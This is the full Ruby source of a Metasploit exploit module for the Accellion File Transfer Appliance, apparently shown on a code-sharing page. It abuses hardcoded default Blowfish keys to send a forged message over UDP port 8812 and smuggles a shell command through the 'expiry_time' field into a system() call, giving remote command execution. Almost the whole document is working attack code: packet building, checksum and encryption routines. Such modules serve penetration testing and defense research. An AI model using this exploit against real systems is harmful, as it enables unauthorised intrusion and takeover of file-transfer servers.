Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'openssl'
7
require 'rexml/element'
8

9
class MetasploitModule < Msf::Exploit::Remote
10
  Rank = ExcellentRanking
11

12
  include Msf::Exploit::Remote::Udp
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'           => 'Accellion FTA MPIPE2 Command Execution',
17
      'Description'    => %q{
18
          This module exploits a chain of vulnerabilities in the Accellion
19
        File Transfer appliance. This appliance exposes a UDP service on
20
        port 8812 that acts as a gateway to the internal communication bus.
21
        This service uses Blowfish encryption for authentication, but the
22
        appliance ships with two easy to guess default authentication keys.
23
        This module abuses the known default encryption keys to inject a
24
        message into the communication bus. In order to execute arbitrary
25
        commands on the remote appliance, a message is injected into the bus
26
        destined for the 'matchrep' service. This service exposes a function
27
        named 'insert_plugin_meta_info' which is vulnerable to an input
28
        validation flaw in a call to system(). This provides access to the
29
        'soggycat' user account, which has sudo privileges to run the
30
        primary admin tool as root. These two flaws are fixed in update
31
        version FTA_8_0_562.
32
      },
33
      'Author'         => [ 'hdm' ],
34
      'License'        => MSF_LICENSE,
35
      'References'     =>
36
        [
37
          ['OSVDB', '71362'],
38
          ['OSVDB', '71363'],
39
          ['URL', 'http://www.rapid7.com/security-center/advisories/R7-0039.jsp'],
40
        ],
41
      'Platform'       => ['unix'],
42
      'Arch'           => ARCH_CMD,
43
      'Privileged'     => true,
44
      'Payload'        =>
45
        {
46
          'Space'       => 1024,
47
          'DisableNops' => true,
48
          'Compat'      =>
49
            {
50
              'PayloadType' => 'cmd',
51
              'RequiredCmd' => 'generic perl ruby telnet',
52
            }
53
        },
54
      'Targets'        =>
55
        [
56
          [ 'Automatic', { } ]
57
        ],
58
      'DefaultTarget' => 0,
59
      'DisclosureDate' => '2011-02-07'
60
    ))
61

62
    register_options(
63
      [
64
        Opt::RPORT(8812),
65
        OptString.new('APPID', [true, 'The application ID (usually 1000)', '1000'])
66
      ])
67
  end
68

69
  def exploit
70
    connect_udp
71

72
    appid = datastore['APPID']
73
    encoded_command = REXML::Text.new(payload.encoded).to_s
74

75
    wddx = %Q|
76
<wddxPacket version='1.0'>
77
<header/>
78
<data>
79
  <struct>
80
    <var name='50001'><string>insert_plugin_meta_info</string></var>
81
    <var name='file_handle'><binary length='9'>MDAwMDAwMDAw</binary></var>
82
    <var name='aid'><string>#{appid}</string></var>
83
    <var name='client_ip'><string>127.0.0.1</string></var>
84
    <var name='package_id'><string>1</string></var>
85
    <var name='recipient_list'><array length='1'><string>#{Rex::Text.rand_text_alphanumeric(8)}</string></array></var>
86
    <var name='expiry_time'><string>&apos;; #{encoded_command}; #&apos;</string></var>
87
  </struct>
88
</data>
89
</wddxPacket>|
90

91
    packet = [
92
      rand(0xffffffff),	# Source Location ID
93
      8888,				# Destination Location ID
94
      rand(0xffff),		# Source Application
95
      50001,				# Destination Application (matchrep)
96
      Time.now.to_i
97
    ].pack("NNnnN") + wddx
98

99
    header = [
100
      0,		# Flags
101
      0,		#
102
      1,		# Sequence Number (must be the lowest seen from Source ID)
103
      33		# Execute (pass message to destination)
104
    ].pack("CCNC") + packet
105

106
    data = [ simple_checksum(header) ].pack("n") + header
107
    enc  = blowfish_encrypt("123456789ABCDEF0123456789ABCDEF0", data)
108

109
    udp_sock.put("\x01" + enc)
110

111
    handler
112
    disconnect_udp
113
  end
114

115
  def simple_checksum(data)
116
    sum = 0
117
    data.unpack("C*").map{ |c| sum = (sum + c) & 0xffff }
118
    sum
119
  end
120

121
  #
122
  # This implements blowfish-cbc with an MD5-expanded 448-bit key
123
  # using RandomIV for the initial value.
124
  #
125
  def blowfish_encrypt(pass, data)
126

127
    # Forces 8-bit encoding
128
    pass = pass.unpack("C*").pack("C*")
129
    data = data.unpack("C*").pack("C*")
130

131
    # Use 448-bit keys with 8-byte IV
132
    key_len = 56
133
    iv_len  = 8
134

135
    # Expand the key with MD5 (key-generated-key mode)
136
    hash = OpenSSL::Digest::MD5.digest(pass)
137
    while (hash.length < key_len)
138
      hash << OpenSSL::Digest::MD5.digest(hash)
139
    end
140

141
    key = hash[0, key_len]
142
    iv  = Rex::Text.rand_text(iv_len)
143

144
    c = OpenSSL::Cipher.new('bf-cbc')
145
    c.encrypt
146
    c.key_len = key_len
147
    c.key     = key
148
    c.iv      = iv
149

150
    "RandomIV" + iv + c.update(data) + c.final
151
  end
152
end
153

154